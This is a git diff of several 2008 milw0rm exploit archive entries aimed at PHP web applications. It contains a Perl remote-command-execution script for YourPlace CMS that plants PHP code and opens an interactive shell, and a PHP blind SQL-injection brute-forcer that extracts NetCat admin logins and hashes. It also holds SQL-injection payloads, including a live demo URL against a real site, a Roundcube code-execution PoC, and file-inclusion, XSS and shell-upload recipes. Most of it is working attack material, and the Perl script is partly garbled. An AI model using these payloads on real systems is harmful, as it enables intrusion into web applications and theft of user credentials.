+Vulnerability  : DB Disclosure / Arbitrary Data Saving (RCE EXPLOIT) / Arbitrary File Upload / PHPInfo Disclosure / User Change Account
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Website        : http://osirys.org
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+* This script has also other vulnerability. Here you can find just the major ones !
+  I wrote a simple RCE Exploit also.
+
+
+############################################################################################################################################
+[0x02] Bug: [Database Disclosure]
+######
+
+Vulnerable file is: /[path]/user/info/users.txt
+
+This script uses a .txt file to store usernames and passwords.
+
+### [!] EXPLOIT:
+                 1) Go at: /[path]/user/info/users.txt
+                 2) Get username and password !
+                 ex: osirys	$1$H9mfzCTo$gbuasEowB1agfEqWolcGR.
+                     username   password crypted with crypt function
+
+
+############################################################################################################################################
+[0x03] Bug: [Arbitrary Data Saving] ## RCE EXPLOIT !!
+######
+
+Bugged file is: /[path]/internettoolbar/edit.php
+
+To exploit this vulnerability, we must be logged in.
+
+[CODE]
+
+				$fav5_url = $_POST['fav5_url'];
+				$fav1_name = $_POST['fav5_name'];
+				
+				$write = "";
+									
+				$write = str_replace('$','$',$write);
+				$fp = fopen("../user/internettoolbar/index.php", "w+");
+				$fw = fwrite($fp, $write);
+
+[/CODE]
+
+All the $fav variables come from POST. There is any cheek on what the user put in the form of $fav vars.
+Then the script will save the value of this vars in /[path]/user/internettoolbar/index.php.
+So we can put an evil php code ;)
+I wrote a simple exploit, a simple proof of concept, change it in your own way ;)
+This exploit can be adapted to your own needs.
+
+############################################################
+##########################################
+## Remote Command Execution Perl Exploit
+
+[code]
+
+#!/usr/bin/perl
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+my $path      = "/internettoolbar/edit.php";
+my $exec_path = "/user/internettoolbar/index.php";
+my $c0de      = "lol.it';?>new;
+my $post = $ua->post($url,
+                          [
+                            fav1_url => $c0de,
+                            do       => submit
+                          ]);
+
+if ($post->is_success) {
+    print "[+] Commands:\n";
+    print "    exit         -> quit the exploit \n";
+    print "    your command -> exec your cmd    \n";
+    &exec_cmd;
+}
+else {
+    print "[-] Can't write hell code !\n";
+    exit(0);
+}
+
+sub exec_cmd {
+    print "shell[Osirys]$>\n";
+    $cmd = ;
+    $cmd !~ /exit/ || die "[-] Quitting ..\n";
+    $exec_url = ($host.$exec_path."?cmd=".$cmd);
+    $re = query($exec_url);
+    if ($re =~ /\?>(.*)/) {
+        print "[*] $1\n";
+        &exec_cmd;
+    }
+    else {
+        print "[-] Undefined output or bad cmd !\n";
+        &exec_cmd;
+    }
+}
+
+sub query() {
+    $link = $_[0];
+    my $req = HTTP::Request->new(GET => $link);
+    my $ua = LWP::UserAgent->new();
+    $ua->timeout(4);
+    my $response = $ua->request($req);
+    return $response->content;
+}
+
+sub cheek() {
+    my $host = $_[0];
+    if ($host =~ /http:\/\/(.*)/) {
+        return 1;
+    }
+    else {
+        return 0;
+    }
+}
+
+sub banner {
+    print "\n".
+          "  ============================ \n".
+          "     YourPlace RCE Exploit     \n".
+          "      Coded by Osirys          \n".
+          "      osirys[at]live[dot]it    \n".
+          "      Proud to be italian      \n".
+          "  ============================ \n\n";
+}
+
+sub help() {
+    my $error = $_[0];
+    if ($error == -1) {
+        &banner;
+        print "\n[-] Cheek that you typed the hostname address and the command to execute !\n";
+    }
+    elsif ($error == -2) {
+        &banner;
+        print "\n[-] Bad hostname address !\n";
+    }
+    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
+    exit(0);
+}
+
+[/CODE]
+
+
+############################################################################################################################################
+[0x04] Bug: [Arbitrary File Upload]
+######
+
+Bugged file is: /[path]/apps/standard/upload.php
+
+To upload our local file we must be logged in. Then we can upload any file.
+The bug here is to allow user to upload file of any extensions, in fact there isn't any extension cheek.
+
+
+### [!] EXPLOIT: 
+                 1) Go at: /[path]/apps/standard/upload.php
+                 2) Upload your local file.
+                 3) Cheek it here: /[path]/user/uploads/your_file.your_ext
+
+
+############################################################################################################################################
+[0x05] Bug: [PHPInfo Disclosure]
+######
+
+Vulnerable file is: /[path]/user/uploads/phpinfo.php
+
+
+### [!] EXPLOIT:
+                 1) Go at /[path]/user/uploads/phpinfo.php
+                 2) Get php information
+
+
+############################################################################################################################################
+[0x06] Bug: [User Change Account]
+######
+
+Bugged file is: /[path]/login/register.php
+
+[CODE]
+
+if (isset ($_POST['submit'])) {
+	$fp = fopen ( '../user/info/users.txt', 'w+' );
+	
+	if ($fp){
+		$data = $_POST['username']."\t".crypt($_POST['password'])."\r\n";
+		fwrite ( $fp, $data );
+		fclose ( $fp );
+		echo ":-)";
+	}
+
+[/CODE]
+
+Registering a new user, the old one will be deleted.
+
+
+### [!] EXPLOIT: Go at: /[path]/login/register_form.php
+                 Register your new user
+
+
+############################################################################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7546.txt b/platforms/php/webapps/7546.txt
index c6593881d..4aedf40ed 100755
--- a/platforms/php/webapps/7546.txt
+++ b/platforms/php/webapps/7546.txt
@@ -1,33 +1,33 @@
-#############################################################
-Joomla Component com_volunteer(job_id) SQL-injection
-#############################################################
-
-
-###################################################
-#[~] Author  :   boom3rang 
-#[~] Site    :   www.khg-crew.ws
-#[~] Greetz  :   H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-----------------------------------------
-#[!] Volunteer
-#[!] 05.04.2007
-#[!] John Pan
-#[!] johnpanq@sina.com
-#[!] 2.0
-###################################################
-
-Example:
-http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]
-
-Exploit:
--9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
-
-LiveDEMO:
-http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-12-22]
+#############################################################
+Joomla Component com_volunteer(job_id) SQL-injection
+#############################################################
+
+
+###################################################
+#[~] Author  :   boom3rang 
+#[~] Site    :   www.khg-crew.ws
+#[~] Greetz  :   H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+----------------------------------------
+#[!] Volunteer
+#[!] 05.04.2007
+#[!] John Pan
+#[!] johnpanq@sina.com
+#[!] 2.0
+###################################################
+
+Example:
+http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]
+
+Exploit:
+-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
+
+LiveDEMO:
+http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7548.php b/platforms/php/webapps/7548.php
index 01194cece..ef3ab80e3 100755
--- a/platforms/php/webapps/7548.php
+++ b/platforms/php/webapps/7548.php
@@ -1,85 +1,85 @@
-search, $this->replace, $text);
-
-Some patterns in $this->search allow interpret PHP code using the "e"
-flag, i.e.:
-'/]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // 
-'/]*>(.+?)<\/b>/ie',                // 
-'/]*>(.+?)<\/th>/ie',              //  and 
-
-In concrete those would be replaced by:
-'$this->_build_link_list("\\2", "\\3")', // 
-'strtoupper("\\1")',                    // 
-"strtoupper(\"\t\t\\1\n\")",            //  and 
-
-Now using PHP complex (curly) syntax we can take advantage of this to
-interpret arbitrary PHP code, evaluating PHP code embedded inside
-strings.
-
-
-Proof of Concept
-----
-As this vulnerability was discovered in-the-wild:
-http://trac.roundcube.net/ticket/1485618 was quite sure that would be
-exploitable, using PHP curly we can execute phpinfo():
-
-wget -q --header="Content-Type: ''" \
--O - --post-data='{${phpinfo()}}' \
---no-check-certificate \
-http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php
-
-Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc
-to avoid using single or double quotes the arbitrary shell command
-execution is fully feasible. As this vulnerability was discovered last
-week no more details will be published yet, more info will be available
-at http://sofistic.net.
-
-
-
--- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net 
-
-# milw0rm.com [2008-12-22]
+Public Release Date of POC: 2008-12-22
+Author: Jacobo Avariento Gimeno (Sofistic)
+CVE id: CVE-2008-5619
+Bugtraq id: 32799
+Severity: Critical
+Vulnerability reported by: RealMurphy
+
+
+Intro
+----
+Roundcube Webmail is a browser-based IMAP client that uses
+"chuggnutt.com HTML to Plain Text Conversion" library to convert
+HTML text to plain text, this library uses the preg_replace PHP
+function in an insecure manner.
+
+Vulnerable versions:
+Round Cube RoundCube Webmail 0.2-3 beta
+Round Cube RoundCube Webmail 0.2-1 alpha (tested)
+
+
+Analysis of the vulnerable code
+----
+The script bin/html2text.php creates an instance of the class html2text
+with the given POST data, the problem arises in the file
+program/lib/html2text.php in function _convert() on line 381:
+
+        // Run our defined search-and-replace
+        $text = preg_replace($this->search, $this->replace, $text);
+
+Some patterns in $this->search allow interpret PHP code using the "e"
+flag, i.e.:
+'/]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // 
+'/]*>(.+?)<\/b>/ie',                // 
+'/]*>(.+?)<\/th>/ie',              //  and 
+
+In concrete those would be replaced by:
+'$this->_build_link_list("\\2", "\\3")', // 
+'strtoupper("\\1")',                    // 
+"strtoupper(\"\t\t\\1\n\")",            //  and 
+
+Now using PHP complex (curly) syntax we can take advantage of this to
+interpret arbitrary PHP code, evaluating PHP code embedded inside
+strings.
+
+
+Proof of Concept
+----
+As this vulnerability was discovered in-the-wild:
+http://trac.roundcube.net/ticket/1485618 was quite sure that would be
+exploitable, using PHP curly we can execute phpinfo():
+
+wget -q --header="Content-Type: ''" \
+-O - --post-data='{${phpinfo()}}' \
+--no-check-certificate \
+http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php
+
+Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc
+to avoid using single or double quotes the arbitrary shell command
+execution is fully feasible. As this vulnerability was discovered last
+week no more details will be published yet, more info will be available
+at http://sofistic.net.
+
+
+
+-- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net 
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7551.txt b/platforms/php/webapps/7551.txt
index 2027d74bd..fe1a33da4 100755
--- a/platforms/php/webapps/7551.txt
+++ b/platforms/php/webapps/7551.txt
@@ -1,44 +1,44 @@
- -----------------------------------------------------
- Calendar Script v1.1 Admin Login Bypass Vulnerability
- -----------------------------------------------------
- by athos - staker[at]hotmail[dot]it
- http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
-
- File Vuln "index.php" (code details)
-
- ------------------------------------------------------------
-
- 4.  $action = $_POST['action'];
- 5.
- 6.  switch($action) {
- 7.  case 'login':
- 8.  // login
- 9.  $username = stripslashes(trim($_POST['username']));
- 10. $password = sha1(stripslashes(trim($_POST['password'])));
- 11.
- 12. if(empty($username) || empty($password)) {
- 13. // Stop, someone tried entering nothing into here
- 14. // Show an error.
- 15. $loginMsg = 'You must enter a username and password';
- 16. } else {
- 17. // The input seems to be ok, check it against the database.
- 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn);
-
- ------------------------------------------------------------
-
- Exploit
-
- http://[host]/[path]/index.php
-
- (Login) Username: ' or 1=1# & Password: anything
-
- ------------------------------------------------------------
-
- Fix: $username = mysql_real_escape_string($_POST['username']);
-
- Note: works regardless php.ini settings (str0ke =D)
-       don't add me on msn messenger
-
- ------------------------------------------------------------
-
-# milw0rm.com [2008-12-22]
+ -----------------------------------------------------
+ Calendar Script v1.1 Admin Login Bypass Vulnerability
+ -----------------------------------------------------
+ by athos - staker[at]hotmail[dot]it
+ http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
+
+ File Vuln "index.php" (code details)
+
+ ------------------------------------------------------------
+
+ 4.  $action = $_POST['action'];
+ 5.
+ 6.  switch($action) {
+ 7.  case 'login':
+ 8.  // login
+ 9.  $username = stripslashes(trim($_POST['username']));
+ 10. $password = sha1(stripslashes(trim($_POST['password'])));
+ 11.
+ 12. if(empty($username) || empty($password)) {
+ 13. // Stop, someone tried entering nothing into here
+ 14. // Show an error.
+ 15. $loginMsg = 'You must enter a username and password';
+ 16. } else {
+ 17. // The input seems to be ok, check it against the database.
+ 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn);
+
+ ------------------------------------------------------------
+
+ Exploit
+
+ http://[host]/[path]/index.php
+
+ (Login) Username: ' or 1=1# & Password: anything
+
+ ------------------------------------------------------------
+
+ Fix: $username = mysql_real_escape_string($_POST['username']);
+
+ Note: works regardless php.ini settings (str0ke =D)
+       don't add me on msn messenger
+
+ ------------------------------------------------------------
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7552.txt b/platforms/php/webapps/7552.txt
index 8cf31b596..1d91b5e6e 100755
--- a/platforms/php/webapps/7552.txt
+++ b/platforms/php/webapps/7552.txt
@@ -1,26 +1,26 @@
-###############################################################
-#
-#           REDPEACH CMS - SQL Injection Vulnerability     
-#	    http://www.redpeach.de/
-#                                                             
-#      Vulnerability discovered by: Lidloses_Auge             
-#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
-#                                   Palme, GPM, karamble, Free-Hack
-#      Date:                        23.12.2008
-#
-###############################################################
-#                                                             
-#      Admin Panel: [Target]/admin/login.php
-#      Description: The Files "index.php" and "page.php" contain
-#		    vulnerable SQL Querys at the GET Parameter "zv".
-#		    In the most cases you need a table prefix, which
-#		    is similar to the websites' name, so you can guess.
-#		    After table prefix there's "_user".
-#		    The important column names are "username" and "password".
-#		    The number of columns is 8 almost everytime.
-#
-#      Example:     http://www.website.com/page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/*
-#                                                             
-###############################################################
-
-# milw0rm.com [2008-12-22]
+###############################################################
+#
+#           REDPEACH CMS - SQL Injection Vulnerability     
+#	    http://www.redpeach.de/
+#                                                             
+#      Vulnerability discovered by: Lidloses_Auge             
+#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
+#                                   Palme, GPM, karamble, Free-Hack
+#      Date:                        23.12.2008
+#
+###############################################################
+#                                                             
+#      Admin Panel: [Target]/admin/login.php
+#      Description: The Files "index.php" and "page.php" contain
+#		    vulnerable SQL Querys at the GET Parameter "zv".
+#		    In the most cases you need a table prefix, which
+#		    is similar to the websites' name, so you can guess.
+#		    After table prefix there's "_user".
+#		    The important column names are "username" and "password".
+#		    The number of columns is 8 almost everytime.
+#
+#      Example:     http://www.website.com/page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/*
+#                                                             
+###############################################################
+
+# milw0rm.com [2008-12-22]
diff --git a/platforms/php/webapps/7558.txt b/platforms/php/webapps/7558.txt
index 8378adc88..6cbeea42e 100755
--- a/platforms/php/webapps/7558.txt
+++ b/platforms/php/webapps/7558.txt
@@ -1,26 +1,26 @@
-phpLD 3.3 Blind SQL Injection
-http://www.phplinkdirectory.com/
-
-magic_quotes_gpc = Off
-register_globals = On
-
-Vulnerable:
-GET http://site/phpld/page.php?name=
-
-True Request:
-(validpagename)' or 1=1#
-
-False Request:
-(validpagename)' or 1=0#
-
-Try this (urlencode):
-(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...
-
-Field value example:
-{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f
-
-
-- Seasons Greetings -
-- http://nukeit.org -
-
-# milw0rm.com [2008-12-23]
+phpLD 3.3 Blind SQL Injection
+http://www.phplinkdirectory.com/
+
+magic_quotes_gpc = Off
+register_globals = On
+
+Vulnerable:
+GET http://site/phpld/page.php?name=
+
+True Request:
+(validpagename)' or 1=1#
+
+False Request:
+(validpagename)' or 1=0#
+
+Try this (urlencode):
+(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...
+
+Field value example:
+{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f
+
+
+- Seasons Greetings -
+- http://nukeit.org -
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7559.php b/platforms/php/webapps/7559.php
index c44f3d96f..6e56a6ea4 100755
--- a/platforms/php/webapps/7559.php
+++ b/platforms/php/webapps/7559.php
@@ -1,215 +1,215 @@
-
-	
-	[+] Brute 42 symbol...
-	.....................................
-	[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
-	
-	
-	[+] Exploiting is finished successfully
-	[+] Login - admin
-	[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
-	[+] Decrypt MySQL hash and login into NetCat CMS.
-
-*/
-
-
-function http_connect($query)
-{
-
-	global $server;
-
-	$headers = array(
-	    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
-	    'Referer' => $server
-	);
-
-	$res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
-	$res_http->addHeaders($headers);
-
-	try {
-		$response = $res_http->send()->getBody();
-
-		if (eregi("page_header", $response))
-		{
-			return 1;
-		}
-		else
-		{
-			return 0;
-		}
-
-	} catch (HttpException $exception) {
-
-		print "[-] Not connected";
-		exit(0);
-
-	}
-
-}
-
-function brute($User_id,$table)
-{
-	$ret_str = "";
-
-	for ($i=1;$i<43;$i++)
-	{
-		print "[+] Brute $i symbol...\n";
-
-		for ($j=42;$j<123;$j++)
-		{
-			$q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";
-
-			if (http_connect($q))
-			{
-				$ret_str=$ret_str.chr($j);
-				print chr($j)."\n";
-				break;
-			}
-			print ".";
-
-			if ($j == 57) $j = 96;
-			if ($j == 42) $j = 47;
-
-		}
-
-		if ($j == 123) break;
-	}
-
-	return $ret_str;
-}
-
-
-function help_argc($script_name)
-{
-print "
-usage:
-
-# ./".$script_name." -s=NetCat_server -u=User_ID
-
-The options are required:
- -u The user identifier (number in table)
- -s Target for exploiting
-
-example:
-
-# ./".$script_name." -s=http://localhost/netcat/ -u=1
-[+] Phase 1 brute login.
-[+] Brute 1 symbol...
-..1
-[+] Brute 2 symbol...
-.....................................
-[+] Phase 1 successfully finished: 1
-[+] Phase 2 brute password-hash.
-[+] Brute 1 symbol...
-.....................................
-[+] Phase 2 successfully finished:
-
-
-[+] Exploiting is finished successfully
-[+] Login - 1
-[+] MySQL hash -
-[+] You can login into NetCat CMS with the empty password
-";
-}
-
-function successfully($login,$hash)
-{
-print "
-
-[+] Exploiting is finished successfully
-[+] Login - $login
-[+] MySQL hash - $hash
-";
-
-if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
-else print "[+] You can login into NetCat CMS with the empty password\n";
-
-}
-
-if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
-{
-	help_argc($argv[0]);
-	exit(0);
-}
-else
-{
-	$ARG = array(); 
-	foreach ($argv as $arg) { 
-		if (strpos($arg, '-') === 0) { 
-			$key = substr($arg,1,1);
-			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
-		} 
-	}
-
-	if ($ARG[s] && $ARG[u])
-	{
-		$server = $ARG[s];
-		$User_id = intval($ARG[u]);
-		$User_id--;
-
-		print "[+] Phase 1 brute login.\n";
-		$login = brute($User_id,"Login");
-		print "\n[+] Phase 1 successfully finished: $login\n";
-
-		print "[+] Phase 2 brute password-hash.\n";
-		$hash = brute($User_id,"Password");
-		print "\n[+] Phase 2 successfully finished: $hash\n";
-
-		successfully($login,$hash);
-	}
-	else
-	{
-		help_argc($argv[0]);
-		exit(0);
-	}
-
-}
-
-?> 
-
-# milw0rm.com [2008-12-23]
+
+	
+	[+] Brute 42 symbol...
+	.....................................
+	[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
+	
+	
+	[+] Exploiting is finished successfully
+	[+] Login - admin
+	[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
+	[+] Decrypt MySQL hash and login into NetCat CMS.
+
+*/
+
+
+function http_connect($query)
+{
+
+	global $server;
+
+	$headers = array(
+	    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
+	    'Referer' => $server
+	);
+
+	$res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
+	$res_http->addHeaders($headers);
+
+	try {
+		$response = $res_http->send()->getBody();
+
+		if (eregi("page_header", $response))
+		{
+			return 1;
+		}
+		else
+		{
+			return 0;
+		}
+
+	} catch (HttpException $exception) {
+
+		print "[-] Not connected";
+		exit(0);
+
+	}
+
+}
+
+function brute($User_id,$table)
+{
+	$ret_str = "";
+
+	for ($i=1;$i<43;$i++)
+	{
+		print "[+] Brute $i symbol...\n";
+
+		for ($j=42;$j<123;$j++)
+		{
+			$q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";
+
+			if (http_connect($q))
+			{
+				$ret_str=$ret_str.chr($j);
+				print chr($j)."\n";
+				break;
+			}
+			print ".";
+
+			if ($j == 57) $j = 96;
+			if ($j == 42) $j = 47;
+
+		}
+
+		if ($j == 123) break;
+	}
+
+	return $ret_str;
+}
+
+
+function help_argc($script_name)
+{
+print "
+usage:
+
+# ./".$script_name." -s=NetCat_server -u=User_ID
+
+The options are required:
+ -u The user identifier (number in table)
+ -s Target for exploiting
+
+example:
+
+# ./".$script_name." -s=http://localhost/netcat/ -u=1
+[+] Phase 1 brute login.
+[+] Brute 1 symbol...
+..1
+[+] Brute 2 symbol...
+.....................................
+[+] Phase 1 successfully finished: 1
+[+] Phase 2 brute password-hash.
+[+] Brute 1 symbol...
+.....................................
+[+] Phase 2 successfully finished:
+
+
+[+] Exploiting is finished successfully
+[+] Login - 1
+[+] MySQL hash -
+[+] You can login into NetCat CMS with the empty password
+";
+}
+
+function successfully($login,$hash)
+{
+print "
+
+[+] Exploiting is finished successfully
+[+] Login - $login
+[+] MySQL hash - $hash
+";
+
+if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
+else print "[+] You can login into NetCat CMS with the empty password\n";
+
+}
+
+if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
+{
+	help_argc($argv[0]);
+	exit(0);
+}
+else
+{
+	$ARG = array(); 
+	foreach ($argv as $arg) { 
+		if (strpos($arg, '-') === 0) { 
+			$key = substr($arg,1,1);
+			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
+		} 
+	}
+
+	if ($ARG[s] && $ARG[u])
+	{
+		$server = $ARG[s];
+		$User_id = intval($ARG[u]);
+		$User_id--;
+
+		print "[+] Phase 1 brute login.\n";
+		$login = brute($User_id,"Login");
+		print "\n[+] Phase 1 successfully finished: $login\n";
+
+		print "[+] Phase 2 brute password-hash.\n";
+		$hash = brute($User_id,"Password");
+		print "\n[+] Phase 2 successfully finished: $hash\n";
+
+		successfully($login,$hash);
+	}
+	else
+	{
+		help_argc($argv[0]);
+		exit(0);
+	}
+
+}
+
+?> 
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7560.txt b/platforms/php/webapps/7560.txt
index 1b085482f..c0280a682 100755
--- a/platforms/php/webapps/7560.txt
+++ b/platforms/php/webapps/7560.txt
@@ -1,48 +1,48 @@
-NetCat <= 3.12 Multiple Remote Vulnerabilities
-
-The description:
-The set vulnerability in CMS NetCat versions 3.12 and more low was revealed.
-
-1. Multiple File Including Vulnerabilities
-
-Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible.
-It gives the chance to redefine internal variables which are transferred as arguments in function include ().
-Examples of vulnerable files:
-/netcat/modules/netshop/post.php?system=../../../../.htaccess%00
-/netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00
-/netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00
-/netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00
-/netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00
-
-The note:
-For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off
-
-2. Blind SQL Injection Vulnerabilities
-
-Examples of vulnerable files:
-/netcat/modules/auth/password_recovery.php?=1'SQL_code
-
-Example:
-/netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*
-
-The note:
-For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off
-
-3. Multiple Cross-site Scripting Vulnerabilities
-
-Examples of vulnerable files: 
-/netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" 
-/netcat/FCKeditor/neditor.php?form=&control= etc.
-
-4. HTTP Response Splitting
-
-Examples of vulnerable files: 
-/netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com 
-/netcat/modules/linkmanager/redirect.php?url=http://www.google.com
-
-5. CRLF injection 
-
-Vulnerability exists at the moment of value installation %0a in COOKIEvariables.
-Vulnerability has been found out at the reference to a file /netcat/add.php.
-
-# milw0rm.com [2008-12-23]
+NetCat <= 3.12 Multiple Remote Vulnerabilities
+
+The description:
+The set vulnerability in CMS NetCat versions 3.12 and more low was revealed.
+
+1. Multiple File Including Vulnerabilities
+
+Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible.
+It gives the chance to redefine internal variables which are transferred as arguments in function include ().
+Examples of vulnerable files:
+/netcat/modules/netshop/post.php?system=../../../../.htaccess%00
+/netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00
+/netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00
+/netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00
+/netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00
+
+The note:
+For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off
+
+2. Blind SQL Injection Vulnerabilities
+
+Examples of vulnerable files:
+/netcat/modules/auth/password_recovery.php?=1'SQL_code
+
+Example:
+/netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*
+
+The note:
+For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off
+
+3. Multiple Cross-site Scripting Vulnerabilities
+
+Examples of vulnerable files: 
+/netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" 
+/netcat/FCKeditor/neditor.php?form=&control= etc.
+
+4. HTTP Response Splitting
+
+Examples of vulnerable files: 
+/netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com 
+/netcat/modules/linkmanager/redirect.php?url=http://www.google.com
+
+5. CRLF injection 
+
+Vulnerability exists at the moment of value installation %0a in COOKIEvariables.
+Vulnerability has been found out at the reference to a file /netcat/add.php.
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7561.txt b/platforms/php/webapps/7561.txt
index 4a480a776..06e2d8353 100755
--- a/platforms/php/webapps/7561.txt
+++ b/platforms/php/webapps/7561.txt
@@ -1,30 +1,30 @@
-...................................................................................................
-
-****(remote shell upload/xss)****
-
-script: phpGreetCards
-   
-***************************************************************************
-download from:http://www.w2b.ru/download/phpGreetCards.zip
-   
-***************************************************************************
-www.site.com/path/index.php?mode=select&category
-
-shell: www.site.com/path/userfiles/number_shell.php
------------------------------------------------------------------------------------------
-dork:"powered by phpGreetCards"
-
-if folder userfiles is forbidden
-after get upload file u do right-click and see image properties and u see address file.
-  
-------------------------------------------------------------------------------------------
-xss:
-index.php?mode=select&category=>">alert(0)%3B  
-**************************************************
-
-
-Author: ahmadbady 
-
-**************************************************
-
-# milw0rm.com [2008-12-23]
+...................................................................................................
+
+****(remote shell upload/xss)****
+
+script: phpGreetCards
+   
+***************************************************************************
+download from:http://www.w2b.ru/download/phpGreetCards.zip
+   
+***************************************************************************
+www.site.com/path/index.php?mode=select&category
+
+shell: www.site.com/path/userfiles/number_shell.php
+-----------------------------------------------------------------------------------------
+dork:"powered by phpGreetCards"
+
+if folder userfiles is forbidden
+after get upload file u do right-click and see image properties and u see address file.
+  
+------------------------------------------------------------------------------------------
+xss:
+index.php?mode=select&category=>">alert(0)%3B  
+**************************************************
+
+
+Author: ahmadbady 
+
+**************************************************
+
+# milw0rm.com [2008-12-23]
